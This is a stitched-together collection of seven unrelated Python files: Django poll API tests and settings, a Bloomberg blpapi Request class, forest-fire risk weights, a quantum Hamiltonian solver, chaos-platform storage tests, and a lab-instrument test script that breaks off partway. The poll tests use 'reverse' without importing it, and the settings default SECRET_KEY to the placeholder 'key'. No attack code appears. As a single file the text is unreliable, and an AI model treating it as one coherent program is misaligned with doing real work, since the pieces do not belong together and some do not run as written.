from rest_framework.test import APIClient
from polls.models import Poll
from .common import create_poll_data
class TestPoll:
    """API tests for the poll endpoints: anonymous users may only read,
    admins may create/update, and date validation is enforced."""

    url_list = reverse('poll-list')

    @property
    def url_detail(self):
        # Detail URL of the single poll the tests create (always pk=1).
        # Was declared as a property taking a `pk=1` parameter, which a
        # property getter can never receive — the parameter was dead.
        return reverse('poll-detail', kwargs={'pk': 1})

    def test_user_get(self, user_client: APIClient):
        response = user_client.get(self.url_list)
        assert response.status_code == 200, (
            'User should be able to get poll list. ',
            response.json()
        )

    def test_admin_get(self, admin_client: APIClient):
        response = admin_client.get(self.url_list)
        assert response.status_code == 200, (
            'Admin user should be able to get poll list. ',
            response.json()
        )

    def test_user_create(self, user_client: APIClient):
        assert Poll.objects.count() == 0
        data = create_poll_data()
        response = user_client.post(self.url_list, data)
        assert response.status_code == 401, (
            'User should NOT be able to create poll',
            response.json()
        )
        # Nothing must have been persisted.
        assert Poll.objects.count() == 0

    def test_admin_create(self, admin_client: APIClient):
        assert Poll.objects.count() == 0
        data = create_poll_data()
        response = admin_client.post(self.url_list, data)
        assert response.status_code == 201, (
            'User should be able to create poll',
            response.json()
        )
        assert Poll.objects.count() == 1
        # All submitted fields must round-trip to the database.
        poll = Poll.objects.get(pk=1)
        assert poll.title == data['title']
        assert poll.description == data['description']
        assert poll.date_start.strftime('%Y-%m-%d') == data['date_start']
        assert poll.date_end.strftime('%Y-%m-%d') == data['date_end']

    def test_user_update(self, user_client: APIClient):
        data = create_poll_data()
        Poll.objects.create(**data)
        assert Poll.objects.count() == 1
        # Neither partial (PATCH) nor full (PUT) updates are allowed.
        response = user_client.patch(self.url_detail, {'title': 'New title'})
        assert response.status_code == 401, (
            'User should NOT be able to update poll',
            response.json()
        )
        response = user_client.put(self.url_detail, data)
        assert response.status_code == 401, (
            'User should NOT be able to update poll',
            response.json()
        )

    def test_admin_update(self, admin_client: APIClient):
        data = create_poll_data()
        Poll.objects.create(**data)
        assert Poll.objects.count() == 1
        response = admin_client.patch(self.url_detail, {'title': 'New title'})
        assert response.status_code == 200, (
            'Admin should be able to update poll',
            response.json()
        )
        response = admin_client.put(self.url_detail, data)
        assert response.status_code == 200, (
            'Admin should be able to update poll',
            response.json()
        )

    def test_time(self, admin_client: APIClient):
        from datetime import datetime, timedelta
        # end < start must be rejected, on create ...
        date_start = datetime.today()
        date_end = datetime.today() - timedelta(days=1)
        data = create_poll_data(date_start=date_start, date_end=date_end)
        response = admin_client.post(self.url_list, data)
        assert response.status_code == 400, (
            'Date end should be greater than date start',
            response.json()
        )
        # ... on full-pair patch ...
        data = create_poll_data()
        Poll.objects.create(**data)
        response = admin_client.patch(
            self.url_detail,
            {'date_start': date_start, 'date_end': date_end}
        )
        assert response.status_code == 400, (
            'Date end should be greater than date start',
            response.json()
        )
        # ... and when only date_end is patched past the existing start.
        response = admin_client.patch(
            self.url_detail,
            {'date_end': date_end}
        )
        assert response.status_code == 400, (
            'Date end should be greater than date start',
            response.json()
        )
        # Attempting to move date_start must leave it unchanged.
        new_date_start = date_start - timedelta(days=1)
        response = admin_client.patch(
            self.url_detail,
            {'date_start': new_date_start}
        )
        db_date_start = Poll.objects.get(pk=1).date_start.strftime('%Y-%m-%d')
        date_start = date_start.strftime('%Y-%m-%d')
        assert db_date_start == date_start, (
            'Change start date is NOT allowed.',
        )
|
# -*- coding: utf-8 -*-
from configurations import Configuration
from django.contrib.messages import constants as messages
from kaio import Options
from kaio.mixins import CachesMixin, DatabasesMixin, LogsMixin, PathsMixin, SecurityMixin, DebugMixin, WhiteNoiseMixin
# Option reader: pulls configuration values from the environment/.ini (kaio).
opts = Options()
class Base(CachesMixin, DatabasesMixin, PathsMixin, LogsMixin, SecurityMixin, DebugMixin,
           WhiteNoiseMixin, Configuration):
    """
    Project settings for development and production.

    Most values are read from the environment (via kaio's ``Options``);
    the second argument to ``opts.get`` is the development default.
    """
    DEBUG = opts.get('DEBUG', True)
    BASE_DIR = opts.get('APP_ROOT', None)
    APP_SLUG = opts.get('APP_SLUG', 'tenerife_japon_status')
    SITE_ID = 1
    # NOTE(review): 'key' is an insecure placeholder — SECRET_KEY must be
    # provided through the environment in production.
    SECRET_KEY = opts.get('SECRET_KEY', 'key')
    # Localisation: Spanish UI, Madrid time, timezone-aware datetimes.
    USE_I18N = True
    USE_L10N = True
    USE_TZ = True
    LANGUAGE_CODE = 'es'
    TIME_ZONE = 'Europe/Madrid'
    ROOT_URLCONF = 'main.urls'
    WSGI_APPLICATION = 'main.wsgi.application'
    INSTALLED_APPS = [
        # django
        'django.contrib.admin',
        'django.contrib.auth',
        'django.contrib.contenttypes',
        'django.contrib.sessions',
        'django.contrib.sites',
        'django.contrib.messages',
        'django.contrib.staticfiles',
        'django.contrib.humanize',
        # apps
        'main',
        'toilet',
        'stats',
        # 3rd parties
        'raven.contrib.django.raven_compat',
        'django_extensions',
        'django_yubin',
        'kaio',
        'logentry_admin',
        'channels',
        'timedeltatemplatefilter',
    ]
    MIDDLEWARE = [
        'django.middleware.security.SecurityMiddleware',
        'django.middleware.locale.LocaleMiddleware',
        'django.contrib.sessions.middleware.SessionMiddleware',
        'django.middleware.common.CommonMiddleware',
        'django.middleware.csrf.CsrfViewMiddleware',
        'django.contrib.auth.middleware.AuthenticationMiddleware',
        'django.contrib.messages.middleware.MessageMiddleware',
        'django.middleware.clickjacking.XFrameOptionsMiddleware',
    ]
    # SecurityMiddleware options
    SECURE_BROWSER_XSS_FILTER = True
    TEMPLATES = [
        {
            'BACKEND': 'django.template.backends.django.DjangoTemplates',
            'DIRS': [
                # insert additional TEMPLATE_DIRS here
            ],
            'OPTIONS': {
                'context_processors': [
                    "django.contrib.auth.context_processors.auth",
                    "django.template.context_processors.debug",
                    "django.template.context_processors.i18n",
                    "django.template.context_processors.media",
                    "django.template.context_processors.static",
                    "django.contrib.messages.context_processors.messages",
                    "django.template.context_processors.tz",
                    'django.template.context_processors.request',
                    'constance.context_processors.config',
                ],
                'loaders': [
                    'django.template.loaders.filesystem.Loader',
                    'django.template.loaders.app_directories.Loader',
                ]
            },
        },
    ]
    # Outside development, wrap the loaders in the caching loader so each
    # template is compiled only once per process.
    if not DEBUG:
        TEMPLATES[0]['OPTIONS']['loaders'] = [
            ('django.template.loaders.cached.Loader', TEMPLATES[0]['OPTIONS']['loaders']),
        ]
    # Bootstrap 3 alerts integration with Django messages
    MESSAGE_TAGS = {
        messages.ERROR: 'danger',
    }
    # Channels
    # In-memory channel layer for development; Redis-backed in production.
    if DEBUG:
        CHANNEL_LAYERS = {
            "default": {
                "BACKEND": "asgiref.inmemory.ChannelLayer",
                "ROUTING": "toilet.routing.channel_routing",
            },
        }
    else:
        CHANNEL_LAYERS = {
            "default": {
                "BACKEND": "asgi_redis.RedisChannelLayer",
                "CONFIG": {
                    "hosts": ["redis://redis:6379/10"],
                },
                "ROUTING": "toilet.routing.channel_routing",
            },
        }
    # Web Sockets
    WEB_SOCKET_HOST = opts.get('WEB_SOCKET_HOST', '')
|
<filename>src/blpapi/request.py
# request.py
"""Defines a request which can be sent for a service.
This file defines a class 'Request' which represents a request sent through the
Session.
"""
import weakref
from .element import Element
from .exception import _ExceptionUtil
from . import internals
from .chandle import CHandle
class Request(CHandle):
    """A single request to a single service.

    Instances are obtained via :meth:`Service.createRequest()` or
    :meth:`Service.createAuthorizationRequest()` and submitted with
    :meth:`Session.sendRequest()` / :meth:`Session.sendAuthorizationRequest()`.

    The request payload is an :class:`Element` tree: populate it either with
    the convenience methods here or directly on the :class:`Element` returned
    by :meth:`asElement()`, which also exposes the request schema.
    """

    def __init__(self, handle, sessions):
        super(Request, self).__init__(handle, internals.blpapi_Request_destroy)
        self.__handle = handle
        self.__sessions = sessions
        # Weak reference to the lazily created payload Element; see asElement().
        self.__element = None

    def __str__(self):
        """x.__str__() <==> str(x)

        Same as :meth:`toString()` with default formatting arguments.
        """
        return self.toString()

    def set(self, name, value):
        """Shorthand for ``asElement().setElement(name, value)``."""
        self.asElement().setElement(name, value)

    def append(self, name, value):
        """Shorthand for ``getElement(name).appendValue(value)``."""
        return self.getElement(name).appendValue(value)

    def asElement(self):
        """
        Returns:
            Element: The content of this :class:`Request` as an
            :class:`Element`.
        """
        # Reuse the cached Element if the weak reference is still live.
        cached = self.__element() if self.__element is not None else None
        if cached is not None:
            return cached
        element = Element(internals.blpapi_Request_elements(self.__handle),
                          self)
        self.__element = weakref.ref(element)
        return element

    def getElement(self, name):
        """Shorthand for ``asElement().getElement(name)``."""
        return self.asElement().getElement(name)

    def getRequestId(self):
        """
        Return the request's id if one exists, otherwise return ``None``.

        If there are issues with this request, the request id can be
        reported to Bloomberg for troubleshooting purposes. Note that it is
        not a correlation id and must not be used for correlation.

        Returns:
            str: The request id of the request.
        """
        retcode, request_id = internals.blpapi_Request_getRequestId(self.__handle)
        _ExceptionUtil.raiseOnError(retcode)
        return request_id

    def toString(self, level=0, spacesPerLevel=4):
        """Shorthand for ``asElement().toString(level, spacesPerLevel)``."""
        return self.asElement().toString(level, spacesPerLevel)

    def _sessions(self):
        """Return the session(s) this Request is related to. For internal use."""
        return self.__sessions
__copyright__ = """
Copyright 2012. Bloomberg Finance L.P.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to
deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
sell copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions: The above
copyright notice and this permission notice shall be included in all copies
or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
"""
|
class Config:
    """Criterion weights for forest-fire ignition (RAISE1-9) and spread
    (SPREAD10-21) risk models.

    Comments translated from Latvian. NOTE(review): JAC/AHP/MLC appear to be
    three alternative weighting schemes (AHP = Analytic Hierarchy Process?);
    confirm against the producing analysis.
    """
    JAC_RAISE1 = 0.017  # Predicted mean air temperature
    JAC_RAISE2 = 0.016  # Predicted mean precipitation amount
    JAC_RAISE3 = 0.013  # Number of hot days
    JAC_RAISE4 = 0.017  # Forest type
    JAC_RAISE5 = 0.006  # Number of historical fires
    JAC_RAISE6 = 0.002  # Distance from the railway
    JAC_RAISE7 = 0.011  # Distance from a peat-extraction site
    JAC_RAISE8 = 0.008  # Distance from a road
    JAC_RAISE9 = 0.008  # Distance from a fire-lookout tower
    JAC_SPREAD10 = 0.013  # Predicted mean air temperature
    JAC_SPREAD11 = 0.012  # Predicted mean precipitation amount
    JAC_SPREAD12 = 0.010  # Number of hot days
    JAC_SPREAD13 = 0.012  # Predicted mean annual wind speed
    JAC_SPREAD14 = 0.013  # Forest type
    JAC_SPREAD15 = 0.012  # Slope aspect
    JAC_SPREAD16 = 0.007  # Slope gradient
    JAC_SPREAD17 = 0.007  # Distance from a road
    JAC_SPREAD18 = 0.001  # Distance from a water-intake point
    JAC_SPREAD19 = 0.002  # Distance from a fire station
    JAC_SPREAD20 = 0.007  # Distance from a forest cutline
    JAC_SPREAD21 = 0.002  # Distance from a mineralized (firebreak) strip
    AHP_RAISE1 = 0.125  # Predicted mean air temperature
    AHP_RAISE2 = 0.188  # Predicted mean precipitation amount
    AHP_RAISE3 = 0.064  # Number of hot days
    AHP_RAISE4 = 0.353  # Forest type
    AHP_RAISE5 = 0.048  # Number of historical fires
    AHP_RAISE6 = 0.077  # Distance from the railway
    AHP_RAISE7 = 0.090  # Distance from a peat-extraction site
    AHP_RAISE8 = 0.023  # Distance from a road
    AHP_RAISE9 = 0.032  # Distance from a fire-lookout tower
    AHP_SPREAD10 = 0.134  # Predicted mean air temperature
    AHP_SPREAD11 = 0.184  # Predicted mean precipitation amount
    AHP_SPREAD12 = 0.095  # Number of hot days
    AHP_SPREAD13 = 0.033  # Predicted mean annual wind speed
    AHP_SPREAD14 = 0.311  # Forest type
    AHP_SPREAD15 = 0.018  # Slope aspect
    AHP_SPREAD16 = 0.012  # Slope gradient
    AHP_SPREAD17 = 0.049  # Distance from a road
    AHP_SPREAD18 = 0.041  # Distance from a water-intake point
    AHP_SPREAD19 = 0.026  # Distance from a fire station
    AHP_SPREAD20 = 0.032  # Distance from a forest cutline
    AHP_SPREAD21 = 0.065  # Distance from a mineralized (firebreak) strip
    MLC_RAISE1 = 7.211  # Predicted mean air temperature
    MLC_RAISE2 = 7.893  # Predicted mean precipitation amount
    MLC_RAISE3 = 6.453  # Number of hot days
    MLC_RAISE4 = 7.487  # Forest type
    MLC_RAISE5 = 1.236  # Number of historical fires
    MLC_RAISE6 = 0.612  # Distance from the railway
    MLC_RAISE7 = 4.480  # Distance from a peat-extraction site
    MLC_RAISE8 = 4.611  # Distance from a road
    MLC_RAISE9 = 6.016  # Distance from a fire-lookout tower
    MLC_SPREAD10 = 4.827  # Predicted mean air temperature
    MLC_SPREAD11 = 5.307  # Predicted mean precipitation amount
    MLC_SPREAD12 = 4.262  # Number of hot days
    MLC_SPREAD13 = 4.994  # Predicted mean annual wind speed
    MLC_SPREAD14 = 5.000  # Forest type
    MLC_SPREAD15 = 4.971  # Slope aspect
    MLC_SPREAD16 = 1.706  # Slope gradient
    MLC_SPREAD17 = 5.770  # Distance from a road
    MLC_SPREAD18 = 0.093  # Distance from a water-intake point
    MLC_SPREAD19 = 1.180  # Distance from a fire station
    MLC_SPREAD20 = 6.989  # Distance from a forest cutline
    MLC_SPREAD21 = 0.901  # Distance from a mineralized (firebreak) strip
|
"""Methods used to setup the Hamiltonian of the system."""
import numpy as np
from basis import msg
from basis.potential import Potential
class Hamiltonian(object):
    """Represents the Hamiltonian for a 1D quantum potential.

    Args:
        potcfg (str): path to the potential configuration file.
        n_basis (int): The number of basis functions to use in the solution.
        xi (float, optional): The left most edge of the potential. If
          not specified then it is assumed to be the left most edge of the
          potential as defined in `potcfg`.
        xf (float, optional): The right most edge of the potential. If
          not specified then it is assumed to be the right most edge of the
          potential as defined in `potcfg`.

    Attributes:
        pot (:obj:`Potential`): A Potential object that
          represents the potential for the 1D quantum system.
        eigenvals (list): The energy eigenvalues for the system.
        eigenvecs (list): The eigenvectors for the system.
        ham (np.ndarray): An array of the hamiltonian.
        domain (list): The region over which the potential is defined.

    Examples:
        >>> from basis.hamiltonian import Hamiltonian
        >>> h = Hamiltonian("sho.cfg", 10)
        >>> energy = h.eigenvals
        >>> eigenvecs = h.eigenvecs
    """

    def __init__(self, potcfg, n_basis, xi=None, xf=None):
        self.pot = Potential(potcfg)
        # Fall back to the edges defined by the potential configuration.
        # (Identity comparison with None per PEP 8; was `== None`.)
        if xi is None:
            xi = self._find_xi()
        if xf is None:
            xf = self._find_xf()
        self.domain = [xi, xf]
        self.ham = None
        self._construct_ham(n_basis)
        # eigh: the Hamiltonian matrix is real and symmetric.
        self.eigenvals, self.eigenvecs = np.linalg.eigh(self.ham)

    def _find_xi(self):
        """Finds the left most edge of the potential.

        Each key in `pot.regions` is an interval; the global left edge is the
        smallest endpoint over all regions.
        """
        return min(min(key) for key in self.pot.regions)

    def _find_xf(self):
        """Finds the right most edge of the potential."""
        return max(max(key) for key in self.pot.regions)

    def _construct_ham(self, n_basis):
        """Constructs the hamiltonian matrix for the system.

        Args:
            n_basis (int): The number of basis functions to be used
              in the expansion.
        """
        ham = []
        xr, width_b = self._find_xrs()
        for n in range(n_basis):
            row = []
            for m in range(n_basis):
                if n == m:
                    # Diagonal entries: potential term plus the kinetic
                    # energy of the (n+1)-th particle-in-a-box state.
                    hnm = self._hnn((n+1), xr, width_b)
                    en = (np.pi**2)*((n+1)**2)/(abs(self.domain[1] - self.domain[0])**2)
                else:
                    hnm = self._hnm((n+1), (m+1), xr, width_b)
                    en = 0
                row.append(en + hnm)
            ham.append(row)
        self.ham = np.array(ham)

    def _find_xrs(self):
        """Finds the mid points of the potential bariers.

        Returns:
            tuple of lists: The list of the barriers in the well and a list
            of the widths of the barriers in the well.
        """
        xr = []
        width_b = []
        # We need to find the best number of divisions for the system
        # to make sure we aren't missing any bumps. For the average
        # user something like 0.1 will likely suffice, however if the
        # user does something special in their potential then we may
        # need to use a smaller iterative size.
        temp = []
        for key in self.pot.params:
            if key != '__builtins__' and key != 'operator':
                temp.append(abs(self.pot.params[key]))
        if min(temp) > 1:
            divs = 0.1
        else:
            divs = min(temp)/10.0
        xs = np.arange(self.domain[0], self.domain[1]+divs, divs)
        # Now we need to scan through the potential to find the bumps.
        # Vt holds the potential value of the current flat segment followed
        # by the x positions it covers; a change in V(x) closes the segment.
        Vt = [self.pot(xs[0])]
        for x in xs:
            if self.pot(x) > Vt[0]:
                Vt.append(x)
                xr.append(np.mean(Vt[1:]))
                width_b.append(abs(Vt[-1]-Vt[1]))
                Vt = [self.pot(x), x]
            elif self.pot(x) < Vt[0]:
                Vt.append(x)
                xr.append(np.mean(Vt[1:]))
                width_b.append(abs(Vt[-1]-Vt[1]))
                Vt = [self.pot(x), x]
            else:
                Vt.append(x)
        # Close the final segment if it covers more than a single point.
        if len(Vt) > 2:
            xr.append(np.mean(Vt[1:]))
            width_b.append(abs(Vt[-1]-Vt[1]))
        return xr, width_b

    def _hnn(self, n, xr, b):
        """The value of the integral over the basis functions for each x in
        xr for the diagonals of the hamiltonian.

        Args:
            n (int): The column and row number for the matrix element.
            xr (list of float): The midpoints of the potential barriers.
            b (list of float): The widths of the potential barriers.

        Returns:
            float: The value of the sum of all hnn from the paper.
        """
        hnm = 0
        for center, width in zip(xr, b):
            spb = center + width/2.
            smb = center - width/2.
            hnm += self.pot(center)*(self._fnn(spb, n) - self._fnn(smb, n))
        return hnm

    def _hnm(self, n, m, xr, b):
        """The value of the integral over the basis functions for each x in
        xr for the off diagonals of the hamiltonian.

        Args:
            n (int): The row number for the matrix element.
            m (int): The column number for the matrix element.
            xr (list of float): The midpoints of the potential barriers.
            b (list of float): The widths of the potential barriers.

        Returns:
            float: The value of the sum of all hnm from the paper.
        """
        hnm = 0
        for center, width in zip(xr, b):
            spb = center + width/2.
            smb = center - width/2.
            hnm += self.pot(center)*(self._fnm(spb, n, m) - self._fnm(smb, n, m))
        return hnm

    def _fnn(self, x, n):
        """Antiderivative of sin^2(n pi x / L) (normalized), evaluated at x."""
        L = abs(self.domain[1] - self.domain[0])
        return x/L - np.sin(2*np.pi*n*x/L)/(2*np.pi*n)

    def _fnm(self, x, n, m):
        """Antiderivative of the product of the n-th and m-th basis
        functions (n != m), evaluated at x."""
        L = abs(self.domain[1] - self.domain[0])
        sin1 = np.sin((m-n)*np.pi*x/L)/(np.pi*(m-n))
        sin2 = np.sin((m+n)*np.pi*x/L)/(np.pi*(m+n))
        return sin1 - sin2
|
import uuid
from chaosplt_experiment.storage import ExperimentStorage, ExecutionStorage
from chaosplt_experiment.storage.model import Experiment, Execution
from chaosplt_relational_storage.db import orm_session
def test_create_experiment(experiment_storage: ExperimentStorage):
    """A freshly created experiment gets a valid UUID primary key."""
    with orm_session() as session:
        experiment = Experiment.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment={"title": "a tale of one platform"},
            session=session
        )
        session.commit()
        assert uuid.UUID(hex=experiment.id.hex) == experiment.id
def test_load_experiment(experiment_storage: ExperimentStorage):
    """Loading by id round-trips to an equal record."""
    with orm_session() as session:
        experiment = Experiment.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment={"title": "a tale of one platform"},
            session=session
        )
        session.commit()
        assert Experiment.load(experiment.id, session) == experiment
def test_load_experiment_by_user(experiment_storage: ExperimentStorage):
    """Loading by user only matches the owning user."""
    with orm_session() as session:
        owner_id = uuid.uuid4()
        experiment = Experiment.create(
            user_id=owner_id,
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment={"title": "a tale of one platform"},
            session=session
        )
        session.commit()
        # The owner can load the experiment ...
        assert Experiment.load_by_user(owner_id, experiment.id, session) == experiment
        # ... but an unrelated user cannot.
        assert Experiment.load_by_user(uuid.uuid4(), experiment.id, session) is None
def test_load_experiment_list_by_user(experiment_storage: ExperimentStorage):
    """Listing by user returns only that user's experiments."""
    with orm_session() as session:
        owner_id = uuid.uuid4()
        experiment = Experiment.create(
            user_id=owner_id,
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment={"title": "a tale of one platform"},
            session=session
        )
        session.commit()
        # The owner's listing contains exactly the one experiment.
        assert Experiment.list_all_by_user(owner_id, session) == [experiment]
        # An unrelated user sees an empty listing.
        assert Experiment.list_all_by_user(uuid.uuid4(), session) == []
def test_load_experiment_by_workspace(experiment_storage: ExperimentStorage):
    """Loading by workspace returns only that workspace's experiments."""
    with orm_session() as session:
        workspace_id = uuid.uuid4()
        experiment = Experiment.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=workspace_id,
            experiment={"title": "a tale of one platform"},
            session=session
        )
        session.commit()
        # The owning workspace sees the experiment; another workspace does not.
        assert Experiment.load_by_workspace(workspace_id, session) == [experiment]
        assert Experiment.load_by_workspace(uuid.uuid4(), session) == []
def test_delete_experiment(experiment_storage: ExperimentStorage):
    """A deleted experiment can no longer be loaded."""
    with orm_session() as session:
        e = Experiment.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment={"title": "a tale of one platform"},
            session=session
        )
        session.commit()
        fetched_exp = Experiment.load(e.id, session)
        assert e == fetched_exp
        Experiment.delete(e.id, session)
        fetched_exp = Experiment.load(e.id, session)
        # Identity comparison with None (PEP 8); `== None` can be hijacked by
        # ORM-style operator overloading.
        assert fetched_exp is None
def test_create_execution(experiment_storage: ExperimentStorage,
                          execution_storage: ExecutionStorage):
    """Creating an execution for an experiment assigns it a valid UUID id."""
    with orm_session() as session:
        experiment = Experiment.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment={"title": "a tale of one platform"},
            session=session
        )
        # Flush so the experiment id exists for the foreign key below.
        session.flush()
        execution = Execution.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment_id=experiment.id,
            execution={},
            session=session
        )
        session.commit()
        # Round-tripping through the hex form proves the id is a real UUID.
        assert uuid.UUID(hex=execution.id.hex) == execution.id
def test_load_execution(experiment_storage: ExperimentStorage,
                        execution_storage: ExecutionStorage):
    """A committed execution can be loaded back and compares equal."""
    with orm_session() as session:
        experiment = Experiment.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment={"title": "a tale of one platform"},
            session=session
        )
        # Flush so the experiment id exists for the foreign key below.
        session.flush()
        execution = Execution.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment_id=experiment.id,
            execution={},
            session=session
        )
        session.commit()
        assert Execution.load(execution.id, session) == execution
def test_load_execution_by_user(experiment_storage: ExperimentStorage,
                                execution_storage: ExecutionStorage):
    """Executions are listed for their owning user only."""
    with orm_session() as session:
        owner_id = uuid.uuid4()
        experiment = Experiment.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment={"title": "a tale of one platform"},
            session=session
        )
        # Flush so the experiment id exists for the foreign key below.
        session.flush()
        execution = Execution.create(
            user_id=owner_id,
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment_id=experiment.id,
            execution={},
            session=session
        )
        session.commit()
        # Owner's listing contains the execution; an unrelated user gets [].
        assert Execution.load_by_user(owner_id, session) == [execution]
        assert Execution.load_by_user(uuid.uuid4(), session) == []
def test_delete_execution(experiment_storage: ExperimentStorage,
                          execution_storage: ExecutionStorage):
    """Deleting an execution makes subsequent loads return None."""
    with orm_session() as session:
        e = Experiment.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment={"title": "a tale of one platform"},
            session=session
        )
        # Flush so the experiment id exists for the foreign key below.
        session.flush()
        e = Execution.create(
            user_id=uuid.uuid4(),
            org_id=uuid.uuid4(),
            workspace_id=uuid.uuid4(),
            experiment_id=e.id,
            execution={},
            session=session
        )
        session.commit()
        fetched_exp = Execution.load(e.id, session)
        assert e == fetched_exp
        Execution.delete(e.id, session)
        fetched_ex = Execution.load(e.id, session)
        # Identity check: `load` returns None for a missing row, and
        # `== None` would go through the model's __eq__ instead.
        assert fetched_ex is None
|
<gh_stars>1-10
import sys, logging, threading
from typing import List
import time
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
import configparser
config = configparser.ConfigParser()
config.read('config.ini')
# IMPORTANT Path to IHC_PMS_Lib dlls
sys.path.append("/home/for/dev/IHC_PMS_Lib_1.9.2.0/bin")
from ihcWrappers import *
def main():
    """Exercise the IHC_PMS_Lib device wrappers end to end.

    Reads which devices are enabled from ``config.ini`` and, for each enabled
    device (SCILA incubator and/or ODTC thermocycler), discovers it on the
    network, downloads its logs and traces, connects, and walks through the
    SiLA command surface, asserting on every reply.
    """
    print("### IHC_PMS_Lib Test Script ###")
    print("Configuration:")
    print("ODTC: " + config['IHC']['ODTC'])
    print("SCILA: " + config['IHC']['SCILA'])
    print("PMS version: " + PmsWrapper.GetAssemblyVerion())
    pms = PmsWrapper()
    # pms.IpAddressIndex(1) #e.g. Linux VPN (multihomed adapter ip index)
    nics = pms.GetSupportedNICs() #default wired ethernet
    #nics = pms.GetSupportedNICs(NetworkInterfaceTypesWrapper.Vpn) # Windows VPN
    if len(nics) == 0:
        # NOTE(review): flag values combined with "+"; confirm the wrapper
        # expects additive flags rather than bitwise "|".
        nics = pms.GetSupportedNICs(NetworkInterfaceTypesWrapper.WiredEthernet + NetworkInterfaceTypesWrapper.VirtualEthernet)
    if len(nics) > 1:
        nics = pms.GetSupportedNICs(NetworkInterfaceTypesWrapper.Vpn)
    for nic in nics:
        print("Network interface: " + nic.Id + " " + nic.Name + " " + nic.Description)
    # alt static
    #nics = PmsWrapper.SupportedNICs(NetworkInterfaceTypesWrapper.WiredEthernet)
    if len(nics) == 1:
        eru = pms.StartEventReceiver(nics[0].Id) # Explicit Id
    else:
        # manually choose an Id
        eru = pms.StartEventReceiver(nics[1].Id)
    print("EventReceiver Uri: " + eru)
    '''SCILA'''
    if config['IHC']['SCILA'] == "True":
        print("SCILA Dll Version: " + ScilaWrapper.GetAssemblyVersion())
        deviceIp = "192.168.1.128" # predefined scila ip
        # Finder
        frScilas = ScilaFinderWrapper.SearchDevices()
        if len(frScilas) == 0:
            print("No SCILA found")
        for val in frScilas:
            print("Finder result: " + val.Name + " " + str(val.WsdlUri))
            # Gather device info before Create()
            status = PmsWrapper.GetStatus(val.IPv4Address)
            print(val.Name + " state: " + status.State)
            # BUG FIX: Locked is a bool (compared against True below and
            # stringified in the ODTC section), so it must be passed through
            # str() before concatenation to avoid a TypeError.
            print(val.Name + " locked: " + str(status.Locked))
            (r, di) = PmsWrapper.GetDeviceIdentification(val.IPv4Address)
            assert r.ReturnCode == 1
            print(val.Name + " pre-connect GetDeviceIdentification: " + di.DeviceName + " " + di.Wsdl + " " + di.DeviceFirmwareVersion)
        status = PmsWrapper.GetStatus(deviceIp)
        (r, di) = PmsWrapper.GetDeviceIdentification(deviceIp)
        assert r.ReturnCode == 1
        # Download logs and latest trace file
        print("Start log/trace download...")
        error = DownloadScilaLogTraces(ip=deviceIp, path="/home/for/dev/logDownload/" + di.DeviceName, traceFileCount=1, logs=True)
        assert(error is None)
        print("log/trace download finished")
        # Create device
        try:
            scila = pms.Create("http://" + deviceIp + "/scila.wsdl")
        except Exception as ex:
            if (ex.Message) == "Invalid lockId.":
                scila = pms.Create("http://" + deviceIp + "/scila.wsdl", "myLockId")
            else:
                raise
        # Register Callback(s)
        scila.RegisterStatusEventCallback(OnStatusEvent)
        print("Device Name: " + scila.DeviceName)
        print("Current LockId: " + str(scila.LockId))
        di = GetDeviceIdentification(scila)
        assert di.DeviceName == scila.DeviceName
        s = GetStatus(scila)
        assert s.State != "InError"
        # SiLA Commands
        rv = scila.Reset()
        assert rv.Success == True
        # if rv.Success == False:
        #     print("SCILA Reset error: " + rv.Message)
        #     print("Exit")
        #     return
        s = GetStatus(scila)
        assert s.State == "Standby"
        # Lock device
        scila.LockId = "myLockId"
        rv = scila.LockDevice()
        assert rv.Success == True
        # Test lock
        s = GetStatus(scila)
        assert s.Locked == True
        scila.LockId = None # Set Wrong lockId
        rv = scila.GetConfiguration()
        assert rv.Success == False
        # Unlock device
        scila.LockId = "myLockId"
        rv = scila.UnlockDevice()
        assert rv.Success == True
        s = GetStatus(scila)
        assert s.Locked == False
        # GetConfiguration
        rv = scila.GetConfiguration()
        assert rv.Success == True
        print(rv.ResponseData.LogLevel)
        print(rv.ResponseData.NetworkConfig)
        print(rv.ResponseData.SoapCompression)
        print(rv.ResponseData.SysDateTime)
        print(rv.ResponseData.UseDeviceClassDateTime)
        # Configure Device example: import Network-Settings from file
        cx = ScilaConfigXmlWrapper()
        cx.ImportNetworkConfigXml("dhcp.xml")
        print(cx.GetParamsXml())
        # SetConfiguration
